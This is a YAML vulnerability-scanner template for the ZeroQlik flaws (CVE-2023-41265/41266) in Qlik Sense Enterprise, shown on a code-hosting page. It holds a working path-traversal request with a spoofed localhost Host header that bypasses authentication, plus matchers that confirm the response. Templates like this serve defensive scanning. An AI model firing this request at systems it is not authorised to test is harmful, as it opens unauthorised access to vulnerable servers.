-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathzeroqlik-vulnerability.yaml
33 lines (31 loc) · 1.11 KB
/
zeroqlik-vulnerability.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
id: zeroqlik-rce
info:
name: ZeroQlik Vulnerability (CVE-2023-41265 and CVE-2023-41266)
author: Adam Crosser
severity: critical
reference:
- https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801
- https://www.praetorian.com/blog/advisory-qlik-sense/
- https://www.praetorian.com/blog/qlik-sense-technical-exploit
requests:
- method: GET
path:
- "{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"
headers:
Host: localhost
Cookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337
X-Qlik-Xrfkey: 1333333333333337
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
words:
- "The comparison expression does not consist of three elements: .ttf"
part: body
- type: word
part: header
words:
- "X-Qlik-Session"